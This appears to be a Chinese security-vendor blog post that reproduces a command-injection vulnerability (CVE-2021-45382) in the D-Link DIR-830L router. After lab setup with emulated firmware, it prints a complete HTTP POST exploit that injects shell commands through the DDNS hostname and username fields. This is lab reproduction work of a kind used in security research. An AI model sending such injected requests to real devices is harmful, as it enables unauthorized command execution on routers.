提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《威尼斯wns.8885556隐私条款》

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于威尼斯wns.8885556

    申请试用
      D-Link DIR-830L 路由器命令执行漏洞(CVE-2021-45382)复现
      发布时间:2023-06-30 阅读次数: 514 次


      环境搭建

      1.FirmAE 工具安装

      首先拉取FirmAE 工具仓库


      git clone --recursive https://github.com/pr0v3rbs/FirmAE

      图片

      运行下载脚本


      1. cd FirmAE/
        ./download.sh


      图片

      运行./install.sh进行安装

      图片

      图片

      2.下载固件

      本文模拟的是设备型号为D-Link DIR-830L

      下载地址:


      https://legacy.us.dlink.com/pages/product.aspx?id=f5e0c0a1975a46bab0b5f38b22c5087b
      下载后得到DIR830LA1_FW100B07.bin固件文件
      图片

      3.FirmAE工具初始化

      FirmAE工具目录下执行./init.sh进行初始化

      图片
      4.安装binwalk
      这里使用FirmAE工具目录下的binwalk安装程序进行安装
      cd binwalk-2.3.3/
      python3 setup.py install

      5.模拟运行固件
      执行如下命令对固件进行解压
      binwalk -Me /root/DIR830LA1_FW100B07.bin --run-as=root
      图片
      执行如下命令来模拟运行固件
      sudo ./run.sh -r DIR-830 /root/DIR830LA1_FW100B07.bin
      图片
      使用浏览器访问
      http://192.168.0.1
      图片

      漏洞复现

      Exp如下:

      POST /ddns_check.ccp 
      HTTP/1.1Host: 192.168.0.1
      User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101Firefox/95.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      X-Requested-With: XMLHttpRequest
      Content-Length: 102
      Origin: http://192.168.0.1
      Connection: close
      Cookie: uid=YnnCDFxmJY # 认证信息,此漏洞需要认证
      ccp_act=doCheck&ddnsHostName=;ls />/www/1.html;&ddnsUsername=;ls />/www/1.html;&ddnsPassword=123123123

      图片

      这里我们已经成功看到执行系统命令,并将ls /命令的结果写入1.html中,直接访问即可查看命令执行的效果。

      图片


      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部